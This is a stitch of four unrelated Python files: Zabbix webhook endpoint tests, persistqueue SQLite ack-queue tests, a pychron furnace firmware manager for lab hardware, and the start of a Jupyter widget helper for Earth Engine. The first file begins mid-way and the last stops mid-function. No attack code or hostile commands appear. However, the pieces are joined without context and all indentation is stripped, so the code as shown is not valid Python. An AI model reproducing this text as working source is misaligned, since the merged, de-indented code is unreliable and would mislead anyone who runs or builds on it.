valid_credentials = base64.b64encode(str.encode("{}:{}".format(defaults['username'], defaults['password']))).decode("utf-8")
current_dir = os.getcwd()
current_dir = current_dir + '/zabbix-webhook/src/app/tests/data'
client = TestClient(app)
@pytest.fixture()
def dummy_tcp_server():
tcp_server = TCPServer.TCPServer()
with tcp_server as example_server:
thread = threading.Thread(target=example_server.listen_for_traffic)
thread.daemon = True
thread.start()
yield example_server
def read_json_file(filename):
# read file content and return as JSON Dict
with open(filename, 'r') as file:
return json.load(file)
def exec_post_global(url, data={}, auth=True, add_headers=None):
h = {}
if auth is True:
h = {"Content-Type": "application/json", "Authorization": "Basic " + valid_credentials}
if add_headers is not None:
h = h | add_headers
#print(current_dir+'/headers:{}'.format(h))
return client.post(url, json=data, headers=h)
def test_post_aws(dummy_tcp_server):
response = exec_post_global("/zabbix/aws/sns",
read_json_file(current_dir+'/aws.notif.json'),
True,
{'x-amz-sns-message-type': 'Notification'})
print('test_post_aws.status_code:{}'.format(response.status_code))
assert response.status_code == 200
def test_post_aws_no_auth():
response = exec_post_global("/zabbix/aws/sns",
{}, False)
print('test_post_aws_no_auth.status_code:{}'.format(response.status_code))
assert response.status_code == 401
def test_post_gcp(dummy_tcp_server):
response = exec_post_global("/zabbix/gcp",
read_json_file(current_dir+'/gcp.incident1.json'))
print('test_post_gcp.status_code:{}'.format(response.status_code))
assert response.status_code == 200
def test_post_gcp_no_auth():
response = exec_post_global("/zabbix/gcp",
{}, False)
print('test_post_gcp_no_auth.status_code:{}'.format(response.status_code))
assert response.status_code == 401
def test_post_azure_common(dummy_tcp_server):
response = exec_post_global("/zabbix/azure/common",
read_json_file(current_dir+'/azure.common.json'))
print(current_dir+'/test_post_azure_common.status_code:{}'.format(response.status_code))
assert response.status_code == 200
def test_post_azure_common_no_auth():
response = exec_post_global("/zabbix/azure/common",
{}, False)
print('test_post_azure_common_no_auth.status_code:{}'.format(response.status_code))
assert response.status_code == 401
def test_post_generic(dummy_tcp_server):
response = exec_post_global("/zabbix/generic",
read_json_file(current_dir+'/generic.json'))
print('test_post_generic.status_code:{}'.format(response.status_code))
assert response.status_code == 200
def test_post_generic_no_auth():
response = exec_post_global("/zabbix/generic",
{}, False)
print('test_post_generic_no_auth.status_code:{}'.format(response.status_code))
assert response.status_code == 401
def test_get_health_stats():
response = client.get("/health/stats",
headers={"Authorization": "Basic " + valid_credentials})
print('test_get_health_stats.status_code:{}'.format(response.status_code))
assert response.status_code == 200
def test_get_health():
response = client.get("/health")
print('test_get_health.status_code:{}'.format(response.status_code))
assert response.status_code == 200
def test_get_help():
response = client.get("/help")
print('test_get_help.status_code:{}'.format(response.status_code))
assert response.status_code == 200
if __name__ == "__main__":
""" Health & stats """
test_get_help()
test_get_health()
test_get_health_stats()
""" Generic """
test_post_generic()
""" Azure """
test_post_azure_common()
""" GCP """
test_post_gcp()
""" AWS """
#test_post_aws()
|
test_sqlackqueue.py
|
# coding=utf-8
import random
import shutil
import sys
import tempfile
import unittest
from threading import Thread
from persistqueue.sqlackqueue import (
SQLiteAckQueue,
FILOSQLiteAckQueue,
UniqueAckQ)
from persistqueue import Empty
class SQLite3AckQueueTest(unittest.TestCase):
def setUp(self):
self.path = tempfile.mkdtemp(suffix='sqlackqueue')
self.auto_commit = True
def tearDown(self):
shutil.rmtree(self.path, ignore_errors=True)
def test_raise_empty(self):
q = SQLiteAckQueue(self.path, auto_commit=self.auto_commit)
q.put('first')
d = q.get()
self.assertEqual('first', d)
self.assertRaises(Empty, q.get, block=False)
# assert with timeout
self.assertRaises(Empty, q.get, block=True, timeout=1.0)
# assert with negative timeout
self.assertRaises(ValueError, q.get, block=True, timeout=-1.0)
def test_empty(self):
q = SQLiteAckQueue(self.path, auto_commit=self.auto_commit)
self.assertEqual(q.empty(), True)
q.put('first')
self.assertEqual(q.empty(), False)
q.get()
self.assertEqual(q.empty(), True)
def test_open_close_single(self):
"""Write 1 item, close, reopen checking if same item is there"""
q = SQLiteAckQueue(self.path, auto_commit=self.auto_commit)
q.put(b'var1')
del q
q = SQLiteAckQueue(self.path)
self.assertEqual(1, q.qsize())
self.assertEqual(b'var1', q.get())
def test_open_close_1000(self):
"""Write 1000 items, close, reopen checking if all items are there"""
q = SQLiteAckQueue(self.path, auto_commit=self.auto_commit)
for i in range(1000):
q.put('var%d' % i)
self.assertEqual(1000, q.qsize())
del q
q = SQLiteAckQueue(self.path)
self.assertEqual(1000, q.qsize())
for i in range(1000):
data = q.get()
self.assertEqual('var%d' % i, data)
# assert adding another one still works
q.put('foobar')
data = q.get()
self.assertEqual('foobar', data)
def test_random_read_write(self):
"""Test random read/write"""
q = SQLiteAckQueue(self.path, auto_commit=self.auto_commit)
n = 0
for _ in range(1000):
if random.random() < 0.5:
if n > 0:
q.get()
n -= 1
else:
self.assertRaises(Empty, q.get, block=False)
else:
q.put('var%d' % random.getrandbits(16))
n += 1
def test_multi_threaded_parallel(self):
"""Create consumer and producer threads, check parallelism"""
# self.skipTest("Not supported multi-thread.")
m_queue = SQLiteAckQueue(
path=self.path, multithreading=True,
auto_commit=self.auto_commit
)
def producer():
for i in range(1000):
m_queue.put('var%d' % i)
def consumer():
for i in range(1000):
x = m_queue.get(block=True)
self.assertEqual('var%d' % i, x)
c = Thread(target=consumer)
c.start()
p = Thread(target=producer)
p.start()
p.join()
c.join()
self.assertEqual(0, m_queue.size)
self.assertEqual(0, len(m_queue))
self.assertRaises(Empty, m_queue.get, block=False)
def test_multi_threaded_multi_producer(self):
"""Test sqlqueue can be used by multiple producers."""
queue = SQLiteAckQueue(
path=self.path, multithreading=True,
auto_commit=self.auto_commit
)
def producer(seq):
for i in range(10):
queue.put('var%d' % (i + (seq * 10)))
def consumer():
for _ in range(100):
data = queue.get(block=True)
self.assertTrue('var' in data)
c = Thread(target=consumer)
c.start()
producers = []
for seq in range(10):
t = Thread(target=producer, args=(seq,))
t.start()
producers.append(t)
for t in producers:
t.join()
c.join()
def test_multiple_consumers(self):
"""Test sqlqueue can be used by multiple consumers."""
queue = SQLiteAckQueue(
path=self.path, multithreading=True,
auto_commit=self.auto_commit
)
def producer():
for x in range(1000):
queue.put('var%d' % x)
counter = []
# Set all to 0
for _ in range(1000):
counter.append(0)
def consumer(index):
for i in range(200):
data = queue.get(block=True)
self.assertTrue('var' in data)
counter[index * 200 + i] = data
p = Thread(target=producer)
p.start()
consumers = []
for index in range(5):
t = Thread(target=consumer, args=(index,))
t.start()
consumers.append(t)
p.join()
for t in consumers:
t.join()
self.assertEqual(0, queue.qsize())
for x in range(1000):
self.assertNotEqual(0, counter[x],
"not 0 for counter's index %s" % x)
def test_protocol_1(self):
shutil.rmtree(self.path, ignore_errors=True)
q = SQLiteAckQueue(path=self.path)
self.assertEqual(q._serializer.protocol,
2 if sys.version_info[0] == 2 else 4)
def test_protocol_2(self):
q = SQLiteAckQueue(path=self.path)
self.assertEqual(q._serializer.protocol,
2 if sys.version_info[0] == 2 else 4)
def test_ack_and_clear(self):
q = SQLiteAckQueue(path=self.path)
q._MAX_ACKED_LENGTH = 10
ret_list = []
for _ in range(100):
q.put("val%s" % _)
for _ in range(100):
ret_list.append(q.get())
for ret in ret_list:
q.ack(ret)
self.assertEqual(q.acked_count(), 100)
q.clear_acked_data()
self.assertEqual(q.acked_count(), 10)
def test_ack_unknown_item(self):
q = SQLiteAckQueue(path=self.path)
q.put("val1")
val1 = q.get()
q.ack("val2")
q.nack("val3")
q.ack_failed("val4")
self.assertEqual(q.qsize(), 0)
self.assertEqual(q.unack_count(), 1)
q.ack(val1)
self.assertEqual(q.unack_count(), 0)
def test_resume_unack(self):
q = SQLiteAckQueue(path=self.path)
q.put("val1")
val1 = q.get()
self.assertEqual(q.qsize(), 0)
self.assertEqual(q.unack_count(), 1)
self.assertEqual(q.ready_count(), 0)
del q
q = SQLiteAckQueue(path=self.path, auto_resume=False)
self.assertEqual(q.qsize(), 0)
self.assertEqual(q.unack_count(), 1)
self.assertEqual(q.ready_count(), 0)
q.resume_unack_tasks()
self.assertEqual(q.qsize(), 0)
self.assertEqual(q.unack_count(), 0)
self.assertEqual(q.ready_count(), 1)
self.assertEqual(val1, q.get())
del q
q = SQLiteAckQueue(path=self.path, auto_resume=True)
self.assertEqual(q.qsize(), 0)
self.assertEqual(q.unack_count(), 0)
self.assertEqual(q.ready_count(), 1)
self.assertEqual(val1, q.get())
def test_ack_unack_ack_failed(self):
q = SQLiteAckQueue(path=self.path)
q.put("val1")
q.put("val2")
q.put("val3")
val1 = q.get()
val2 = q.get()
val3 = q.get()
        # qsize should be zero when all items have been gotten from the queue
self.assertEqual(q.qsize(), 0)
self.assertEqual(q.unack_count(), 3)
        # nack requeues the item with ready status
q.nack(val1)
self.assertEqual(q.qsize(), 1)
self.assertEqual(q.ready_count(), 1)
        # ack_failed just marks the item as ack-failed
q.ack_failed(val3)
self.assertEqual(q.ack_failed_count(), 1)
        # ack should not affect qsize
q.ack(val2)
self.assertEqual(q.acked_count(), 1)
self.assertEqual(q.qsize(), 1)
        # all ack*-related actions reduce the unack count
self.assertEqual(q.unack_count(), 0)
        # re-get the nacked item
ready_val = q.get()
self.assertEqual(ready_val, val1)
q.ack(ready_val)
self.assertEqual(q.qsize(), 0)
self.assertEqual(q.acked_count(), 2)
self.assertEqual(q.ready_count(), 0)
def test_put_0(self):
q = SQLiteAckQueue(path=self.path)
q.put(0)
d = q.get(block=False)
self.assertIsNotNone(d)
class SQLite3QueueInMemory(SQLite3AckQueueTest):
def setUp(self):
self.path = ":memory:"
self.auto_commit = True
def test_open_close_1000(self):
self.skipTest('Memory based sqlite is not persistent.')
def test_open_close_single(self):
self.skipTest('Memory based sqlite is not persistent.')
def test_multiple_consumers(self):
self.skipTest('Skipped due to occasional crash during '
'multithreading mode.')
def test_multi_threaded_multi_producer(self):
self.skipTest('Skipped due to occasional crash during '
'multithreading mode.')
def test_multi_threaded_parallel(self):
self.skipTest('Skipped due to occasional crash during '
'multithreading mode.')
def test_task_done_with_restart(self):
self.skipTest('Skipped due to not persistent.')
def test_protocol_2(self):
self.skipTest('In memory queue is always new.')
def test_resume_unack(self):
self.skipTest('Memory based sqlite is not persistent.')
class FILOSQLite3AckQueueTest(unittest.TestCase):
def setUp(self):
self.path = tempfile.mkdtemp(suffix='filo_sqlackqueue')
self.auto_commit = True
def tearDown(self):
shutil.rmtree(self.path, ignore_errors=True)
def test_open_close_1000(self):
"""Write 1000 items, close, reopen checking if all items are there"""
q = FILOSQLiteAckQueue(self.path, auto_commit=self.auto_commit)
for i in range(1000):
q.put('var%d' % i)
self.assertEqual(1000, q.qsize())
del q
q = FILOSQLiteAckQueue(self.path)
self.assertEqual(1000, q.qsize())
for i in range(1000):
data = q.get()
self.assertEqual('var%d' % (999 - i), data)
# assert adding another one still works
q.put('foobar')
data = q.get()
self.assertEqual('foobar', data)
class SQLite3UniqueAckQueueTest(unittest.TestCase):
def setUp(self):
self.path = tempfile.mkdtemp(suffix='sqlackqueue')
self.auto_commit = True
def test_add_duplicate_item(self):
q = UniqueAckQ(self.path)
q.put(1111)
self.assertEqual(1, q.size)
# put duplicate item
q.put(1111)
self.assertEqual(1, q.size)
q.put(2222)
self.assertEqual(2, q.size)
del q
q = UniqueAckQ(self.path)
self.assertEqual(2, q.size)
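
# --- Hedged usage sketch (not part of the original test suite) ---
# The tests above exercise the ack lifecycle of SQLiteAckQueue: a get() item
# stays "unacked" until it is ack()-ed, nack()-ed back to ready, or marked
# ack_failed(). The path and item names below are illustrative only.
def _example_ack_lifecycle(path='/tmp/example_ackqueue'):
    q = SQLiteAckQueue(path)
    q.put('job-1')
    item = q.get()            # item is now unacked
    try:
        # ... process item ...
        q.ack(item)           # success: item is archived as acked
    except Exception:
        q.nack(item)          # failure: item is requeued as ready
    q.clear_acked_data()      # optionally trim the acked archive
    return q.qsize(), q.unack_count(), q.acked_count()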
|
manager.py
|
# ===============================================================================
# Copyright 2016 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
# ============= standard library imports ========================
from __future__ import absolute_import
import json
import time
from threading import Thread, Event
import yaml
# ============= local library imports ==========================
from pychron.core.helpers.strtools import to_bool
from pychron.furnace.firmware import PARAMETER_REGISTRY, __version__
from pychron.hardware.arduino.rotary_dumper import RotaryDumper
from pychron.hardware.dht11 import DHT11
from pychron.hardware.eurotherm.headless import HeadlessEurotherm
from pychron.hardware.gauges.granville_phillips.headless_micro_ion_controller import HeadlessMicroIonController
from pychron.hardware.labjack.headless_u3_lv import HeadlessU3LV
from pychron.hardware.mdrive.headless import HeadlessMDrive
from pychron.hardware.watlow.headless_ezzone import HeadlessWatlowEZZone
from pychron.headless_loggable import HeadlessLoggable
from pychron.image.rpi_camera import RPiCamera
from pychron.messaging.broadcaster import Broadcaster
from pychron.paths import paths
DEVICES = {'controller': HeadlessEurotherm,
'switch_controller': HeadlessU3LV,
'funnel': HeadlessMDrive,
'feeder': HeadlessMDrive,
'temp_hum': DHT11,
'camera': RPiCamera,
'first_stage_gauge': HeadlessMicroIonController,
'backside_furnace_gauge': HeadlessMicroIonController,
'bakeout1': HeadlessWatlowEZZone,
'bakeout2': HeadlessWatlowEZZone,
'rotary_dumper': RotaryDumper}
def debug(func):
def wrapper(obj, data):
# obj.debug('------ {}, data={}'.format(func.__name__, data))
r = func(obj, data)
# obj.debug('------ result={}'.format(r))
return r
return wrapper
class FirmwareManager(HeadlessLoggable):
controller = None
switch_controller = None
funnel = None
feeder = None
temp_hum = None
camera = None
    rotary_dumper = None
_switch_mapping = None
_switch_indicator_mapping = None
_is_energized = False
_use_video_service = False
_use_broadcast_service = False
_broadcast_port = 9000
_start_time = 0
_broadcaster = None
_broadcast_stop_event = None
def bootstrap(self, **kw):
self._start_time = time.time()
p = paths.furnace_firmware
with open(p, 'r') as rfile:
            yd = yaml.load(rfile, Loader=yaml.SafeLoader)
self._load_config(yd['config'])
self._load_devices(yd['devices'])
self._load_switch_mapping(yd['switch_mapping'])
self._load_switch_indicator_mapping(yd['switch_indicator_mapping'])
self._load_funnel(yd['funnel'])
self._load_magnets(yd['magnets'])
self._load_rotary_dumper()
if self._use_broadcast_service:
self._broadcaster = Broadcaster()
            self._broadcaster.setup(self._broadcast_port)
self._broadcast_stop_event = Event()
t = Thread(target=self._broadcast, args=(self._broadcaster, self._broadcast_stop_event))
t.start()
if self._use_video_service:
# start camera
if self.camera:
self.camera.start_video_service()
# properties
@property
def furnace_env_humidity(self):
if self.temp_hum:
return self.temp_hum.humdity
@property
def furnace_env_temperature(self):
if self.temp_hum:
return self.temp_hum.temperature
@property
def furnace_setpoint(self):
return self.get_setpoint()
@property
def furnace_process_value(self):
return self.get_temperature()
@property
def feeder_position(self):
if self.feeder:
return self.feeder.position
@property
def funnel_position(self):
if self.funnel:
return self.funnel.position
# getters
# @debug
# def get_jpeg(self, data):
# quality = 100
# if isinstance(data, dict):
# quality = data['quality']
#
# memfile = StringIO()
# self.camera.capture(memfile, name=None, quality=quality)
# memfile.seek(0)
# return json.dumps(memfile.read())
#
# def get_image_array(self, data):
# if self.camera:
# im = self.camera.get_image_array()
# if im is not None:
# imstr = im.dumps()
# return '{:08X}{}'.format(len(imstr), imstr)
def get_heartbeat(self, data):
return '{},{}'.format(time.time(), self._start_time)
def get_furnace_summary(self, data):
h2o_channel = None
if isinstance(data, dict):
h2o_channel = data.get('h2o_channel')
        s = {}
if h2o_channel is not None:
s['h2o_state'] = self.switch_controller.get_channel_state(h2o_channel)
s['setpoint'] = self.get_setpoint(None)
s['response'] = self.get_temperature(None)
s['output'] = self.get_percent_output(None)
return json.dumps(s)
def get_percent_output(self, data):
if self.controller:
return self.controller.get_output()
def get_full_summary(self):
s = {'version': __version__}
for attr in ('furnace_env_humidity', 'furnace_env_temperature',
'furnace_setpoint', 'furnace_process_value',
'feeder_position', 'funnel_position'):
addr = PARAMETER_REGISTRY.get(attr)
if addr:
v = getattr(self, attr)
s[addr] = v
ss = []
for k in self._switch_mapping:
_, o, c = self.get_indicator_component_states(k)
rs = self.get_channel_state(k)
ss.append('{},s{},o{},c{}'.format(k, rs, o, c))
s[PARAMETER_REGISTRY.get('switch_status')] = ';'.join(ss)
return json.dumps(s)
@debug
def get_lab_humidity(self, data):
if self.temp_hum:
self.temp_hum.update()
return self.temp_hum.humdity
@debug
def get_lab_temperature(self, data):
if self.temp_hum:
self.temp_hum.update()
return self.temp_hum.temperature
@debug
def get_temperature(self, data):
if self.controller:
return self.controller.get_process_value()
@debug
def get_setpoint(self, data):
if self.controller:
return self.controller.process_setpoint
@debug
def get_magnets_state(self, data):
return 0
@debug
def get_position(self, data):
drive = self._get_drive(data)
if drive:
return drive.get_position()
@debug
def moving(self, data):
drive = self._get_drive(data)
if drive:
return drive.moving()
@debug
def is_funnel_down(self, data):
funnel = self.funnel
if funnel:
pos = funnel.read_position()
return abs(pos - self._funnel_down) < self._funnel_tolerance
@debug
def is_funnel_up(self, data):
funnel = self.funnel
if funnel:
pos = funnel.read_position()
return abs(pos - self._funnel_up) < self._funnel_tolerance
@debug
def get_channel_state(self, data):
if self.switch_controller:
ch, inverted = self._get_switch_channel(data)
result = self.switch_controller.get_channel_state(ch)
if inverted:
result = not result
return result
@debug
def get_indicator_state(self, data):
if self.switch_controller:
args = self._get_indicator_info(data)
return args[0]
@debug
def get_indicator_component_states(self, data):
if self.switch_controller:
args = self._get_indicator_info(data)
return ','.join(args)
@debug
def get_di_state(self, data):
if self.switch_controller:
if isinstance(data, dict):
di = data['name']
else:
di = data
return self.switch_controller.get_channel_state(di)
@debug
def get_version(self, data):
return __version__
# setters
@debug
def set_frame_rate(self, data):
if self.camera:
self.camera.frame_rate = int(data)
@debug
def set_setpoint(self, data):
if self.controller:
if isinstance(data, dict):
sp = data.get('setpoint', 0)
else:
sp = float(data)
self.controller.process_setpoint = sp
return 'OK'
@debug
def open_switch(self, data):
if self.switch_controller:
ch, inverted = self._get_switch_channel(data)
if ch:
self.switch_controller.set_channel_state(ch, False if inverted else True)
return 'OK'
@debug
def close_switch(self, data):
if self.switch_controller:
ch, inverted = self._get_switch_channel(data)
if ch:
self.switch_controller.set_channel_state(ch, True if inverted else False)
return 'OK'
@debug
def raise_funnel(self, data):
if self.funnel:
return self.funnel.move_absolute(self._funnel_up, block=False)
@debug
def lower_funnel(self, data):
if self.funnel:
return self.funnel.move_absolute(self._funnel_down, block=False)
@debug
def rotary_dumper_moving(self, data):
if self.rotary_dumper:
return self.rotary_dumper.is_moving()
@debug
def energize_magnets(self, data):
if self._magnet_channels:
if self.switch_controller:
period = 3
if data:
if isinstance(data, dict):
period = data.get('period', 3)
else:
period = data
def func():
self._is_energized = True
prev = None
for m in self._magnet_channels:
self.switch_controller.set_channel_state(m, True)
if prev:
self.switch_controller.set_channel_state(prev, False)
prev = m
time.sleep(period)
self.switch_controller.set_channel_state(prev, False)
self._is_energized = False
t = Thread(target=func)
t.start()
return True
else:
if self.rotary_dumper:
nsteps = None
rpm = None
if data:
if isinstance(data, dict):
nsteps = data.get('nsteps', 3)
rpm = data.get('rpm')
else:
nsteps = data
self._is_energized = True
self.rotary_dumper.energize(nsteps, rpm)
# while self.rotary_dumper.is_energized():
# time.sleep(0.5)
# self._is_energized = False
@debug
def is_energized(self, data):
return self._is_energized
@debug
def denergize_magnets(self, data):
self._is_energized = False
if self._magnet_channels:
if self.switch_controller:
for m in self._magnet_channels:
self.switch_controller.set_channel_state(m, False)
return True
else:
if self.rotary_dumper:
nsteps = None
if data:
if isinstance(data, dict):
nsteps = data.get('nsteps')
else:
nsteps = data
self.rotary_dumper.denergize(nsteps)
@debug
def move_absolute(self, data):
drive = self._get_drive(data)
if drive:
units = data.get('units', 'steps')
velocity = data.get('velocity')
return drive.move_absolute(data['position'], velocity=velocity, block=False, units=units)
@debug
def move_relative(self, data):
drive = self._get_drive(data)
if drive:
units = data.get('units', 'steps')
return drive.move_relative(data['position'], block=False, units=units)
@debug
def stop_drive(self, data):
drive = self._get_drive(data)
if drive:
return drive.stop_drive()
@debug
def set_home(self, data):
drive = self._get_drive(data)
if drive:
return drive.set_home()
@debug
def stalled(self, data):
drive = self._get_drive(data)
if drive:
return drive.stalled()
@debug
def slew(self, data):
drive = self._get_drive(data)
if drive:
scalar = data.get('scalar', 1.0)
return drive.slew(scalar)
@debug
def start_jitter(self, data):
drive = self._get_drive(data)
if drive:
turns = data.get('turns', 10)
p1 = data.get('p1', 0.1)
p2 = data.get('p2', 0.1)
velocity = data.get('velocity', None)
acceleration = data.get('acceleration', None)
deceleration = data.get('deceleration', None)
return drive.start_jitter(turns, p1, p2, velocity, acceleration, deceleration)
@debug
def stop_jitter(self, data):
drive = self._get_drive(data)
if drive:
return drive.stop_jitter()
@debug
def set_pid(self, data):
if isinstance(data, dict):
data = data['pid']
controller = self.controller
if controller:
return controller.set_pid_str(data)
@debug
def set_bakeout_setpoint(self, data):
controller = self._get_bakeout_controller(data)
if controller:
value = data['setpoint']
ret = controller.set_closed_loop_setpoint(value)
            # set_closed_loop_setpoint returns True if the requested and actual setpoints differ by more than 0.01:
            # True == failed to set the setpoint
            # None == succeeded in setting the setpoint
return 'OK' if not ret else 'Fail'
@debug
def get_bakeout_setpoint(self, data):
controller = self._get_bakeout_controller(data)
if controller:
return controller.read_closed_loop_setpoint()
@debug
def get_bakeout_temp_and_power(self, data):
controller = self._get_bakeout_controller(data)
if controller:
return controller.get_temp_and_power()
@debug
def set_bakeout_control_mode(self, data):
controller = self._get_bakeout_controller(data)
if controller:
if isinstance(data, dict):
mode = data['mode']
else:
mode = data
return controller.set_control_mode(mode)
@debug
def get_bakeout_temperature(self, data):
controller = self._get_bakeout_controller(data)
if controller:
return controller.get_temperature()
@debug
def get_gauge_pressure(self, data):
controller, channel = self._get_gauge_controller(data)
if controller:
return controller.get_pressure(channel, force=True)
# private
def _get_gauge_controller(self, data):
controller, channel = None, None
if isinstance(data, dict):
name = data['name']
else:
name, channel = data
try:
controller = getattr(self, name)
except AttributeError:
pass
return controller, channel
def _get_bakeout_controller(self, data):
channel = data['channel']
try:
            controller = getattr(self, 'bakeout{}'.format(channel))
except AttributeError:
return 'Invalid bakeout channel {}, data={}'.format(channel, data)
return controller
def _get_indicator_info(self, data):
if self.switch_controller:
if isinstance(data, dict):
alt_name = data['name']
else:
alt_name, _ = data
alt_ch, inverted = self._get_switch_channel(alt_name)
open_ch, close_ch, action = self._get_switch_indicator(data)
#print 'ffffffff {} {} {}'.format(data, open_ch, close_ch)
            if open_ch == 'inverted':
oresult = self.switch_controller.get_channel_state(alt_ch)
oresult = not oresult
else:
invert = False
if open_ch.startswith('i'):
open_ch = open_ch[1:]
invert = True
oresult = self.switch_controller.get_channel_state(open_ch)
#print 'gggggg {} {} {}'.format(invert, open_ch, oresult)
if invert:
oresult = not oresult
if close_ch is None:
#cresult = self.get_channel_state(alt_ch)
#if inverted:
# cresult = not cresult
cresult = None
else:
invert = False
if close_ch.startswith('i'):
close_ch = close_ch[1:]
invert = True
cresult = self.switch_controller.get_channel_state(close_ch)
if invert:
cresult = not cresult
result = oresult
if oresult == cresult:
result = 'Error: OpenIndicator={}, CloseIndicator={}'.format(oresult, cresult)
else:
#if inverted:
# result = not result
result = 'open' if result else 'closed'
#print 'result={}, oresult={}, cresult={}'.format(result, oresult, cresult)
return result, oresult, cresult
# oresult = None
# cresult = None
# if action == 'open' and open_ch is None:
# result = self.get_channel_state(alt_ch)
# else:
# oresult = False if action != 'open' else True
# if open_ch:
# oresult = self.switch_controller.get_channel_state(open_ch)
#
# cresult = True if action != 'open' else False
# if close_ch:
# cresult = self.switch_controller.get_channel_state(close_ch)
#
# if action == 'open':
# result = oresult and not cresult
# else:
# result = not oresult and cresult
#
# # if ch is None:
# # result = self.get_channel_state(alt_ch)
# # else:
# # result = self.switch_controller.get_channel_state(ch)
#
# self.debug('indicator state {}, invert={} Open Indicator={}, Close Indicator={}'.format(result, inverted,
# oresult,
# cresult))
# if inverted:
# result = not result
#
# if action == 'open' and result:
# result = 'open'
# else:
# result = 'closed'
#
# return result, oresult, cresult
def _get_drive(self, data):
drive = data.get('drive')
if drive:
try:
return getattr(self, drive)
except AttributeError:
pass
def _get_switch_channel(self, data):
if isinstance(data, dict):
name = data['name']
else:
name = data
name = str(name)
ch = self._switch_mapping.get(name, '')
inverted = False
if ',' in str(ch):
ch, inverted = ch.split(',')
inverted = to_bool(inverted)
#self.debug('get switch channel {} {}'.format(name, ch))
return ch, inverted
def _get_switch_indicator(self, data):
if isinstance(data, dict):
name = data['name']
action = data['action']
else:
name, action = data
close_ch = None
open_ch = self._switch_indicator_mapping.get(name)
#self.debug('get switch indicator channel {} {}'.format(name, open_ch))
if open_ch == 'inverted':
return open_ch, None, None
if ',' in str(open_ch):
def prep(ch):
ch = ch.strip()
if not ch or ch == '-':
ch = None
return ch
# open_ch, close_ch = list(map(prep, open_ch.split(',')))
open_ch, close_ch = [prep(ci) for ci in open_ch.split(',')]
return open_ch, close_ch, action
def _broadcast(self, bs, evt):
i = 0
while not evt.is_set():
if not i % 10:
bs.send_message(self.get_full_summary())
i = -1
else:
bs.send_message('HeartBeat {}'.format(time.time()))
i += 1
time.sleep(2)
# bootstrapping
def _load_config(self, cd):
self._use_video_service = cd.get('use_video_service', False)
bs = cd.get('broadcast', None)
if bs:
self._use_broadcast_service = bs.get('enabled')
self._broadcast_port = bs.get('port', 9000)
def _load_rotary_dumper(self):
pass
def _load_magnets(self, m):
self._magnet_channels = m
def _load_funnel(self, f):
if self.funnel:
self._funnel_down = self.funnel.tosteps(f['down'])
self._funnel_up = self.funnel.tosteps(f['up'])
self._funnel_tolerance = f['tolerance']
def _load_switch_mapping(self, m):
self._switch_mapping = m
def _load_switch_indicator_mapping(self, m):
self._switch_indicator_mapping = m
def _load_devices(self, devices):
for dev in devices:
self._load_device(dev)
def _load_device(self, devname):
self.debug('load device name={}'.format(devname))
klass = DEVICES.get(devname)
if klass:
dev = klass(name=devname, configuration_dir_name='furnace')
dev.bootstrap()
setattr(self, devname, dev)
else:
self.warning('Invalid device {}'.format(devname))
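
# --- Hedged sketch (illustrative, not part of the original firmware) ---
# _get_switch_channel above accepts mapping values of the form "CH" or
# "CH,<bool>", where the optional second token marks an inverted channel.
# The helper below mirrors that parsing for a plain dict; the example mapping
# and channel names are made up.
def parse_switch_mapping_entry(mapping, name):
    ch = mapping.get(str(name), '')
    inverted = False
    if ',' in str(ch):
        ch, inverted = ch.split(',')
        inverted = to_bool(inverted)
    return ch, inverted

# e.g. parse_switch_mapping_entry({'valve_a': 'FIO4,true'}, 'valve_a')
# would be expected to return ('FIO4', True)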
# ============= EOF =============================================
|
ipytools.py
|
# coding=utf-8
""" General tools for the Jupyter Notebook and Lab """
from ipywidgets import HTML, Tab, Accordion, Checkbox, HBox, Layout, Widget, \
VBox, Button, Box, ToggleButton, IntSlider, FloatText
from traitlets import List, Unicode, observe, Instance, Tuple, Int, Float
from .. import batch
# imports for async widgets
from threading import Thread
from multiprocessing import Pool
import time
# import EE
import ee
if not ee.data._initialized: ee.Initialize()
def create_accordion(dictionary):
""" Create an Accordion output from a dict object """
widlist = []
ini = 0
widget = Accordion()
widget.selected_index = None # this will unselect all
for key, val in dictionary.items():
if isinstance(val, dict):
newwidget = create_accordion(val)
widlist.append(newwidget)
elif isinstance(val, list):
            # transform the list into a dictionary
dictval = {k: v for k, v in enumerate(val)}
newwidget = create_accordion(dictval)
widlist.append(newwidget)
else:
value = HTML(str(val))
widlist.append(value)
widget.set_title(ini, key)
ini += 1
widget.children = widlist
return widget
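
# --- Hedged usage example (illustrative only) ---
# create_accordion turns a (possibly nested) dict into nested Accordions:
# dict values become sub-accordions, lists are re-keyed by index, and any
# other value is rendered as an HTML widget. The dict below is made up.
def _example_create_accordion():
    info = {'id': 'users/someone/asset',
            'properties': {'system:time_start': 0},
            'bands': ['B1', 'B2']}
    return create_accordion(info)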
def create_object_output(object):
    ''' Create an output Widget for Images, Geometries and Features '''
ty = object.__class__.__name__
if ty == 'Image':
info = object.getInfo()
image_id = info['id'] if 'id' in info else 'No Image ID'
prop = info.get('properties')
bands = info.get('bands')
bands_names = [band.get('id') for band in bands]
# BAND PRECISION
bands_precision = []
for band in bands:
data = band.get('data_type')
if data:
precision = data.get('precision')
bands_precision.append(precision)
# BAND CRS
bands_crs = []
for band in bands:
crs = band.get('crs')
bands_crs.append(crs)
# BAND MIN AND MAX
bands_min = []
for band in bands:
data = band.get('data_type')
if data:
bmin = data.get('min')
bands_min.append(bmin)
bands_max = []
for band in bands:
data = band.get('data_type')
if data:
bmax = data.get('max')
bands_max.append(bmax)
# BANDS
new_band_names = []
zipped_data = zip(bands_names, bands_precision, bands_min, bands_max,
bands_crs)
for name, ty, mn, mx, epsg in zipped_data:
value = '<li><b>{}</b> ({}) {} to {} - {}</li>'.format(name,ty,
mn,mx,epsg)
new_band_names.append(value)
bands_wid = HTML('<ul>'+''.join(new_band_names)+'</ul>')
# PROPERTIES
if prop:
new_properties = []
for key, val in prop.items():
value = '<li><b>{}</b>: {}</li>'.format(key, val)
new_properties.append(value)
prop_wid = HTML('<ul>'+''.join(new_properties)+'</ul>')
else:
prop_wid = HTML('Image has no properties')
# ID
header = HTML('<b>Image id:</b> {id} </br>'.format(id=image_id))
acc = Accordion([bands_wid, prop_wid])
acc.set_title(0, 'Bands')
acc.set_title(1, 'Properties')
